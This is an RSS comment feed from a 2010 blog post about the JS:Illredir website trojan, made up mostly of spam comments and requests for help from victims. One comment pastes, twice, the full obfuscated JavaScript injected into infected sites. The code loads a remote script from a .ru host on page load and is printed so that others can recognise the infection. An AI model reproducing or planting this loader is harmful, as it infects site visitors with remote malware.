<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
		>
<channel>
	<title>Comments on: Trojan Attack: JS:Illredir-B [Trj]</title>
	<atom:link href="http://www.zyenweb.com/2009/12/30/trojan-attack-jsillredir-b-trj/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.zyenweb.com/2009/12/30/trojan-attack-jsillredir-b-trj/</link>
	<description>Website design &#124; Videography &#124; Photography</description>
	<lastBuildDate>Sun, 05 Sep 2010 11:02:51 -0400</lastBuildDate>
	<generator>http://wordpress.org/?v=2.9.1</generator>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
		<item>
		<title>By: Minnie Eichholz</title>
		<link>http://www.zyenweb.com/2009/12/30/trojan-attack-jsillredir-b-trj/comment-page-3/#comment-311</link>
		<dc:creator>Minnie Eichholz</dc:creator>
		<pubDate>Sun, 05 Sep 2010 11:02:51 +0000</pubDate>
		<guid isPermaLink="false">http://www.zyenweb.com/?p=81#comment-311</guid>
		<description>I posted concerning earlier.</description>
		<content:encoded><![CDATA[<p>I posted concerning earlier.</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: muwko</title>
		<link>http://www.zyenweb.com/2009/12/30/trojan-attack-jsillredir-b-trj/comment-page-3/#comment-309</link>
		<dc:creator>muwko</dc:creator>
		<pubDate>Wed, 21 Jul 2010 13:26:13 +0000</pubDate>
		<guid isPermaLink="false">http://www.zyenweb.com/?p=81#comment-309</guid>
		<description>it was very interesting to read.
I want to quote your post in my blog. It can?
And you et an account on Twitter?</description>
		<content:encoded><![CDATA[<p>it was very interesting to read.<br />
I want to quote your post in my blog. It can?<br />
And you et an account on Twitter?</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Ami Mortinez</title>
		<link>http://www.zyenweb.com/2009/12/30/trojan-attack-jsillredir-b-trj/comment-page-3/#comment-308</link>
		<dc:creator>Ami Mortinez</dc:creator>
		<pubDate>Fri, 09 Jul 2010 10:06:20 +0000</pubDate>
		<guid isPermaLink="false">http://www.zyenweb.com/?p=81#comment-308</guid>
		<description>Which is what several persons would want to do– producing a big amount of money. it can be incredibly great that you’ve post this a single. at least there would be points that could aid folks on their way in seeking this for the answer of their desires. well anyway, your blog is fantastic. preserve it up.</description>
		<content:encoded><![CDATA[<p>Which is what several persons would want to do– producing a big amount of money. it can be incredibly great that you’ve post this a single. at least there would be points that could aid folks on their way in seeking this for the answer of their desires. well anyway, your blog is fantastic. preserve it up.</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Tess</title>
		<link>http://www.zyenweb.com/2009/12/30/trojan-attack-jsillredir-b-trj/comment-page-3/#comment-305</link>
		<dc:creator>Tess</dc:creator>
		<pubDate>Sat, 12 Jun 2010 23:13:31 +0000</pubDate>
		<guid isPermaLink="false">http://www.zyenweb.com/?p=81#comment-305</guid>
		<description>Hi,

Thank you all for the valuable information. I am not a techy person and I need help. My WP blog was just infected by a Trojan virus JS:Illredir-CB[Trj]. When I open my website, Avast gives a notice that looks like this: 

Object: my website folder\javascript\date.js
Infection: JS:Illredir-CB[Trj]
Action: Connection aborted
Process: c:\Program Files\IE\iexplore.exe

Can anybody help me how to remove this virus? I have informed my hosting about this but they said the infection must be in my local hard drive. Thanks in advance.</description>
		<content:encoded><![CDATA[<p>Hi,</p>
<p>Thank you all for the valuable information. I am not a techy person and I need help. My WP blog was just infected by a Trojan virus JS:Illredir-CB[Trj]. When I open my website, Avast gives a notice that looks like this: </p>
<p>Object: my website folder\javascript\date.js<br />
Infection: JS:Illredir-CB[Trj]<br />
Action: Connection aborted<br />
Process: c:\Program Files\IE\iexplore.exe</p>
<p>Can anybody help me how to remove this virus? I have informed my hosting about this but they said the infection must be in my local hard drive. Thanks in advance.</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Junk silver</title>
		<link>http://www.zyenweb.com/2009/12/30/trojan-attack-jsillredir-b-trj/comment-page-3/#comment-304</link>
		<dc:creator>Junk silver</dc:creator>
		<pubDate>Thu, 03 Jun 2010 08:18:03 +0000</pubDate>
		<guid isPermaLink="false">http://www.zyenweb.com/?p=81#comment-304</guid>
		<description>Fine information, many thanks to the author. It is puzzling to me now, but in general, the usefulness and importance is overwhelming. Very much thanks again and best of luck!</description>
		<content:encoded><![CDATA[<p>Fine information, many thanks to the author. It is puzzling to me now, but in general, the usefulness and importance is overwhelming. Very much thanks again and best of luck!</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Marco</title>
		<link>http://www.zyenweb.com/2009/12/30/trojan-attack-jsillredir-b-trj/comment-page-3/#comment-303</link>
		<dc:creator>Marco</dc:creator>
		<pubDate>Wed, 02 Jun 2010 11:26:14 +0000</pubDate>
		<guid isPermaLink="false">http://www.zyenweb.com/?p=81#comment-303</guid>
		<description>i have a server where some sites were infected, how can i secure the server so this doesnt happen again?</description>
		<content:encoded><![CDATA[<p>i have a server where some sites were infected, how can i secure the server so this doesnt happen again?</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Yohanes Supriyato</title>
		<link>http://www.zyenweb.com/2009/12/30/trojan-attack-jsillredir-b-trj/comment-page-3/#comment-298</link>
		<dc:creator>Yohanes Supriyato</dc:creator>
		<pubDate>Mon, 17 May 2010 04:57:47 +0000</pubDate>
		<guid isPermaLink="false">http://www.zyenweb.com/?p=81#comment-298</guid>
		<description>nice...thank for information.</description>
		<content:encoded><![CDATA[<p>nice&#8230;thank for information.</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Miguel</title>
		<link>http://www.zyenweb.com/2009/12/30/trojan-attack-jsillredir-b-trj/comment-page-3/#comment-297</link>
		<dc:creator>Miguel</dc:creator>
		<pubDate>Thu, 13 May 2010 17:28:26 +0000</pubDate>
		<guid isPermaLink="false">http://www.zyenweb.com/?p=81#comment-297</guid>
		<description>Now there is another &quot;flavour&quot; of this f*cking trojan. AVAST detects it as &quot;JS:Illredir-BL&quot;.

In my case (a few DRUPAL websites) the sites were not loading (a PHP error was spitted out) and therefore I noticed the presence of these weird JS lines at the end of my files.

It seems to use FTP client stored passwords (filezilla&#039;s in my case) to connect to every site and modify files.

It is been a pain in the ass to fix all the mess this shit has done. 

The malware code is something like:
YS=[&quot;r&quot;,&quot;Ro&quot;];this.c=11526;this.c-=10;l={d:&quot;K&quot;};var T={};var y=document;var b=&quot;b&quot;;var Yi=&quot;Yi&quot;;var R=new String(&quot;body6mNV&quot;.substr(0,4));var ln=new Array();var _e=&#039;&#039;;var z=null;var cU=[&quot;vA&quot;];var s=&quot;sc&quot;+&quot;ri&quot;+&quot;pt&quot;;var q=window;this.P=43688;this.P++;var qG;var CB=&quot;&quot;;function i(){mT={M:&quot;rx&quot;};this.If=&#039;&#039;;var X=String(&quot;]&quot;);var H=&#039;&#039;;var Xb={A:13552};var hm={Dp:61130};var B=RegExp;var Sa=[&quot;S_&quot;,&quot;Mo&quot;];this.zO=49795;this.zO+=11;var Z=&quot;\x2f\x62\x72\x61\x6d\x6a\x6e\x65\x74\x2d\x63\x6f\x6d\x2f\x67\x6f\x6f\x67\x6c\x65\x2e\x63\x6f\x6d\x2f\x6c\x65\x6f\x2e\x6f\x72\x67\x2e\x70\x68\x70&quot;;this.g=25187;this.g+=62;var Jv=&quot;Jv&quot;;var X=String(&quot;]&quot;);Ur=29560;Ur--;var Nu=new Array();Ql=60522;Ql--;this.WX=false;function _(L,h){var Yx=new Array();var o=&quot;[&quot;;Vn=6775;Vn++;o+=h;o+=X;lR=[&quot;e&quot;,&quot;vH&quot;];var V=new B(o, new String(&quot;gKaW6&quot;.substr(0,1)));try {var V_=&#039;WH&#039;} catch(V_){};return L[new String(&quot;rep&quot;+&quot;lacgj8&quot;.substr(0,3)+&quot;e&quot;)](V, H);Mm=41961;Mm--;};try {var xu=&#039;vu&#039;} catch(xu){};try {var tm=&#039;IH&#039;} catch(tm){};var CN=&quot;CN&quot;;var w=940941-932861;var XG=String(&quot;http:&quot;+&quot;//nos&quot;+&quot;ypipe&quot;+&quot;.ru:&quot;);this.qS=&#039;&#039;;var Bv=8354;z=String(&quot;onl&quot;+&quot;oad&quot;);cz=[&quot;Ni&quot;,&quot;fv&quot;,&quot;RD&quot;];var VU=&#039;&#039;;var TG=[&quot;uh&quot;];Fq={};var v=_(&#039;cGrQeUaOtBewEOlOeImPeSnwtw&#039;,&#039;PsSIOGDyQiUoFqTBwZX&#039;);var _n=_(&#039;aQp6pKe0nud0C8hui1l3du&#039;,&#039;38uqo0JwM1KQ6V&#039;);qG=function(){var cn=new String();try {try {} catch(ZZ){};F=y[v](s);DC={EY:18252};Ru={eo:49335};VU=XG;try {var UX=&#039;PS&#039;} catch(UX){};ma={lC:11445};VU+=w;this.je=false;VU+=Z;IHU=[];try {var os=&#039;sN&#039;} catch(os){};var D=&quot;src2md&quot;.substr(0,3);cUe={xf:&quot;GK&quot;};var m=_(&#039;d1e1fpeArZ&#039;,&#039;1Xi_pZA&#039;);this.p=46351;this.p+=155;F[D]=VU;var Bm={Vi:&quot;WS&quot;};F[m]=[1][0];kY={oI:false};var PI=new Array();this.VN=&quot;VN&quot;;gL=[&quot;hu&quot;,&quot;wM&quot;,&quot;za&quot;];y[R][_n](F);var ek=new String();} catch(f){var iC={xI:2475};var BZ=new Array();this.qz=24565;this.qz-=141;};try {} catch(yW){};var Xw={kn:62411};};JA=62427;JA++;jI=13986;jI++;};var Sw=&#039;&#039;;var kA=[&quot;KP&quot;,&quot;xb&quot;,&quot;gF&quot;];i();this.Ss=44880;this.Ss++;var Ek=&quot;&quot;;var Sv=[&quot;yb&quot;,&quot;FS&quot;];q[z]=qG;WY=32921;WY-=67;
&lt;!--c415e4beb2f9e345fbdf72b196a83014--&gt;

Hope this helps someone.</description>
		<content:encoded><![CDATA[<p>Now there is another &#8220;flavour&#8221; of this f*cking trojan. AVAST detects it as &#8220;JS:Illredir-BL&#8221;.</p>
<p>In my case (a few DRUPAL websites) the sites were not loading (a PHP error was spitted out) and therefore I noticed the presence of these weird JS lines at the end of my files.</p>
<p>It seems to use FTP client stored passwords (filezilla&#8217;s in my case) to connect to every site and modify files.</p>
<p>It is been a pain in the ass to fix all the mess this shit has done. </p>
<p>The malware code is something like:<br />
YS=["r","Ro"];this.c=11526;this.c-=10;l={d:&#8221;K&#8221;};var T={};var y=document;var b=&#8221;b&#8221;;var Yi=&#8221;Yi&#8221;;var R=new String(&#8220;body6mNV&#8221;.substr(0,4));var ln=new Array();var _e=&#8221;;var z=null;var cU=["vA"];var s=&#8221;sc&#8221;+&#8221;ri&#8221;+&#8221;pt&#8221;;var q=window;this.P=43688;this.P++;var qG;var CB=&#8221;";function i(){mT={M:&#8221;rx&#8221;};this.If=&#8221;;var X=String(&#8220;]&#8221;);var H=&#8221;;var Xb={A:13552};var hm={Dp:61130};var B=RegExp;var Sa=["S_","Mo"];this.zO=49795;this.zO+=11;var Z=&#8221;\x2f\x62\x72\x61\x6d\x6a\x6e\x65\x74\x2d\x63\x6f\x6d\x2f\x67\x6f\x6f\x67\x6c\x65\x2e\x63\x6f\x6d\x2f\x6c\x65\x6f\x2e\x6f\x72\x67\x2e\x70\x68\x70&#8243;;this.g=25187;this.g+=62;var Jv=&#8221;Jv&#8221;;var X=String(&#8220;]&#8221;);Ur=29560;Ur&#8211;;var Nu=new Array();Ql=60522;Ql&#8211;;this.WX=false;function _(L,h){var Yx=new Array();var o=&#8221;[";Vn=6775;Vn++;o+=h;o+=X;lR=["e","vH"];var V=new B(o, new String(&#8220;gKaW6&#8243;.substr(0,1)));try {var V_=&#8217;WH&#8217;} catch(V_){};return L[new String("rep"+"lacgj8".substr(0,3)+"e")](V, H);Mm=41961;Mm&#8211;;};try {var xu=&#8217;vu&#8217;} catch(xu){};try {var tm=&#8217;IH&#8217;} catch(tm){};var CN=&#8221;CN&#8221;;var w=940941-932861;var XG=String(&#8220;http:&#8221;+&#8221;//nos&#8221;+&#8221;ypipe&#8221;+&#8221;.ru:&#8221;);this.qS=&#8221;;var Bv=8354;z=String(&#8220;onl&#8221;+&#8221;oad&#8221;);cz=["Ni","fv","RD"];var VU=&#8221;;var TG=["uh"];Fq={};var v=_(&#8216;cGrQeUaOtBewEOlOeImPeSnwtw&#8217;,'PsSIOGDyQiUoFqTBwZX&#8217;);var _n=_(&#8216;aQp6pKe0nud0C8hui1l3du&#8217;,'38uqo0JwM1KQ6V&#8217;);qG=function(){var cn=new String();try {try {} catch(ZZ){};F=y[v](s);DC={EY:18252};Ru={eo:49335};VU=XG;try {var UX=&#8217;PS&#8217;} catch(UX){};ma={lC:11445};VU+=w;this.je=false;VU+=Z;IHU=[];try {var os=&#8217;sN&#8217;} catch(os){};var D=&#8221;src2md&#8221;.substr(0,3);cUe={xf:&#8221;GK&#8221;};var m=_(&#8216;d1e1fpeArZ&#8217;,'1Xi_pZA&#8217;);this.p=46351;this.p+=155;F[D]=VU;var Bm={Vi:&#8221;WS&#8221;};F[m]=[1][0];kY={oI:false};var PI=new Array();this.VN=&#8221;VN&#8221;;gL=["hu","wM","za"];y[R][_n](F);var ek=new String();} catch(f){var iC={xI:2475};var BZ=new Array();this.qz=24565;this.qz-=141;};try {} catch(yW){};var Xw={kn:62411};};JA=62427;JA++;jI=13986;jI++;};var Sw=&#8221;;var kA=["KP","xb","gF"];i();this.Ss=44880;this.Ss++;var Ek=&#8221;";var Sv=["yb","FS"];q[z]=qG;WY=32921;WY-=67;<br />
<!--c415e4beb2f9e345fbdf72b196a83014--></p>
<p>Hope this helps someone.</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Wordpress: au secours, on attaque mon blog ! &#124; Fantablog</title>
		<link>http://www.zyenweb.com/2009/12/30/trojan-attack-jsillredir-b-trj/comment-page-3/#comment-291</link>
		<dc:creator>Wordpress: au secours, on attaque mon blog ! &#124; Fantablog</dc:creator>
		<pubDate>Tue, 13 Apr 2010 08:32:04 +0000</pubDate>
		<guid isPermaLink="false">http://www.zyenweb.com/?p=81#comment-291</guid>
		<description>[...] Le blog de Zyen qui à eu exactement la même désagréable expérience, beaucoup de commentaires d&#8217;autres victimes et des conseils:  http://www.zyenweb.com/2009/12/30/trojan-attack-jsillredir-b-trj/ [...]</description>
		<content:encoded><![CDATA[<p>[...] Le blog de Zyen qui à eu exactement la même désagréable expérience, beaucoup de commentaires d&#8217;autres victimes et des conseils:  http://www.zyenweb.com/2009/12/30/trojan-attack-jsillredir-b-trj/ [...]</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: fanta78</title>
		<link>http://www.zyenweb.com/2009/12/30/trojan-attack-jsillredir-b-trj/comment-page-3/#comment-290</link>
		<dc:creator>fanta78</dc:creator>
		<pubDate>Mon, 12 Apr 2010 18:24:20 +0000</pubDate>
		<guid isPermaLink="false">http://www.zyenweb.com/?p=81#comment-290</guid>
		<description>I forgot to mention that the malware has added a new file in the /wp-admin/js folder, named users.js

I did not spot it in the first place because its name was similar to a standard Wp file. But a comparison with a blank WP installation shows this extra file.</description>
		<content:encoded><![CDATA[<p>I forgot to mention that the malware has added a new file in the /wp-admin/js folder, named users.js</p>
<p>I did not spot it in the first place because its name was similar to a standard Wp file. But a comparison with a blank WP installation shows this extra file.</p>
]]></content:encoded>
	</item>
</channel>
</rss>
